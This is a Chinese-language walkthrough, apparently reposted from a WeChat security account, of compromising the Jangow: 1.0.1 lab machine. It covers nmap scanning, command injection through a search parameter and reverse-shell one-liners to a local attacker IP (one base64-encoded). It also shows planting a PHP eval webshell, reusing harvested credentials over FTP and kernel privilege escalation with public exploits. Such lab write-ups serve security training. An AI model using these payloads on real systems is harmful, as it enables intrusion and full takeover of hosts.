#主机发现sudo nmap -sn 192.168.0.0/24
#服务版本扫描 TCP扫描sudo nmap -sV -sT --min-rate 10000 192.168.0.105
#udp扫描sudo nmap -sU --min-rate 10000 192.168.0.105
#脚本扫描 系统版本扫描sudo nmap -sC -O 192.168.0.105
#脚本漏洞扫描sudo nmap --script=vuln 192.168.0.105
这是有sql注入嘛?
http://192.168.0.105/
http://192.168.0.105/site/
在底部看到这个,但并没有什么交互。
点击projects,滑到这个页面
点击buscar,跳转到http://192.168.0.105/site/busque.php?buscar=
什么也没有显示,可以看到是php站点。
这里buscar参数思路是目录遍历?任意文件读取?sql注入?命令执行?
前面nmap -O 系统版本扫描是linux系统,尝试一下读取/etc/password
并没有发现什么
sql注入,也没有发现
来个ls看看,有点东西
pwd
尝试反弹shell
bash -i >& /dev/tcp/192.168.0.104/6666 0>&1执行没有反应
/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.104/6666 0>&1'也是一样
用base64看看
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzY2NjYgMD4mMQo= |base64 -d|bash还是一样,寻找其他办法
whoami权限挺低,www-data
尝试写一句话
echo '<?php eval($_POST["secf"]);' > secf.php
可以看到路径是 site
访问一下 http://192.168.0.105/site/secf.php 好像有了
连接webshell
weevely http://192.168.0.105/site/secf.php secf
试试使用哥斯拉(还是靠谱啊)
在wordpress目录下看到一个config文件
在html目录下也发现了一个.backup文件
接下来思路就是使用这些密码进行爆破,登录数据库,但之前扫描端口并没有发现与数据库,ssh相关的端口,但有一个ftp端口,使用这些密码尝试登录发ftp
ftp 192.168.0.105
经过尝试只有.backup文件的账号密码能成功登录ftp
来到/home/jangow01下看到了user.txt文件,下载下来可以看到是flag
拿到了第一个flag,怎么进行提权拿root权限的第二个flag?
对面主机没有开启ssh,如何把shell反弹回来?
哥斯拉执行反弹shell也失败
创建一个j.sh,通过哥斯拉文件上传到靶机执行
bash -i >& /dev/tcp/192.168.0.104/6666 0>&1
上传执行,也没有反弹,此时怀疑是网络问题?还是靶机有限制?不出网?
netstat -ano也没发现什么
此时都没什么思路了
直接看看系统什么版本能不能直接大力出奇迹,用内核提权
uname -a
searchsploit ubuntu 4.4.0-31
一眼看到这四个,后三个对应版本,先试试范围小的43418
searchsploit -m 43418
上传到靶机,gcc编译,执行
gcc 43418.c -o upchmod +x up./up
失败
44298 失败!
47169 失败!
45010 也不行! 666666
难道是不是交互shell?还是要反弹一个交互shell?
在kali编译,上传执行,也是不行
郁闷很久,很久。。。
突然想到前面的网络限制,是不是有限制出网的端口?
改个80,失败
8080,失败
...................
...................
...................
直到443,6666
试一下执行前面编译好的提权工具
淦!!
done!!!
最后重新试了一遍前面提权的四个工具,发现后三个都不行只有最先排除的45010可以,真艹蛋这运气。。。
原文始发于微信公众号(Security Followers):靶机渗透|Jangow: 1.0.1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论